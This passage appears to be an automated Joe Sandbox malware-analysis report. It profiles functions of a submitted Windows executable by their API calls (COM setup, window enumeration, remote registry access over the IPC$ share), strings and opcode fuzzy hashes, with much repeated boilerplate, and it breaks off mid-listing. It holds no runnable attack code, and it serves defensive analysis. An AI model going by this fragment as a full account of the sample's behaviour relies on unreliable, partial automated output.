                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                                                                                                                                                                                                            • String ID: X
                                                                                                                                                                                                                                                            • API String ID: 3104067586-3081909835
                                                                                                                                                                                                                                                            • Opcode ID: b68abb8f803176e9b7dbe847da29e758ec7e9b5067a266dcb368a43c8e18a4a8
                                                                                                                                                                                                                                                            • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b68abb8f803176e9b7dbe847da29e758ec7e9b5067a266dcb368a43c8e18a4a8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                                                                                                                                                                                                                            Function 0046CB5F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 304comCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                                                                                                                                                                                                                            • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                                                                                                                                                                                                                            • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                                                                                                                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0046CDB0
                                                                                                                                                                                                                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                                                                                                                                                                                                                            • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                                                                                                                                                                                                                              • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                                                                                                                                                                                                                              • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                                                                                                                                                                                                                              • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • NULL Pointer assignment, xrefs: 0046CEA6
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                                                                                                                                                                                                                            • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                                            • API String ID: 440038798-2785691316
                                                                                                                                                                                                                                                            • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                                                                                                                                                                                            • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                                                                                                                                                                                                                            Function 00461014 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                                                                                                                                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 004610A3
                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                                                                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                                                                                                                                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                                                                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                                                                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00461248
                                                                                                                                                                                                                                                              • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                                                                                                                                                                                                                            • String ID: ThumbnailClass
                                                                                                                                                                                                                                                            • API String ID: 4136854206-1241985126
                                                                                                                                                                                                                                                            • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                                                                                                                                                                                            • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                                                                                                                                                                                                                            Function 004718BA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                                                                                                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                                                                                                                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00471A1A
                                                                                                                                                                                                                                                            • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                                                                                                                                                                                                            • String ID: 2
                                                                                                                                                                                                                                                            • API String ID: 1331449709-450215437
                                                                                                                                                                                                                                                            • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                                                                                                                                                                                            • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                                                                                                                                                                                                                            Function 0046081F Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                                                                                                                                                                            • __swprintf.LIBCMT ref: 00460915
                                                                                                                                                                                                                                                            • __swprintf.LIBCMT ref: 0046092D
                                                                                                                                                                                                                                                            • _wprintf.LIBCMT ref: 004609E1
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                                                                                                                                                                                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                                                                                                                                                                                                                            • API String ID: 3054410614-2561132961
                                                                                                                                                                                                                                                            • Opcode ID: 525672c6318f03bf5c80d6cc28fa1f1d99bb47d67e8ddb41e80830938e70613e
                                                                                                                                                                                                                                                            • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 525672c6318f03bf5c80d6cc28fa1f1d99bb47d67e8ddb41e80830938e70613e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                                                                                                                                                                                                                            Function 00458651 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135registryshareCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                                                                                                                                                                                                                            • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                                                                                                                                                                                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                                            • API String ID: 600699880-22481851
                                                                                                                                                                                                                                                            • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                                                                                                                                                                            • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                                                                                                                                                                                                                            Function 00450C41 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DestroyWindow
                                                                                                                                                                                                                                                            • String ID: static
                                                                                                                                                                                                                                                            • API String ID: 3375834691-2160076837
                                                                                                                                                                                                                                                            • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                                                                                                                                                                            • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                                                                                                                                                                                                                            Function 0045D94B Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 88COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                                                                                                                                                                                                                            • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                                            • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                                                                                                                                                                                                                            • API String ID: 2907320926-3566645568
                                                                                                                                                                                                                                                            • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                                                                                                                                                                            • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                                                                                                                                                                                                                            Function 00470928 Relevance: 16.7, APIs: 11, Instructions: 166windowtimeCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                                                                                                                                                                                            • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00470A04
                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?), ref: 00470A1C
                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00470A34
                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00470A4C
                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?), ref: 00470A73
                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?), ref: 00470A81
                                                                                                                                                                                                                                                            • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1237572874-0
                                                                                                                                                                                                                                                            • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                                                                                                                                                                            • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                                                                                                                                                                                                                            Function 00479362 Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                                                                                                                                                                                                                            • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004793E1
                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                                                                                                                                                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 00479461
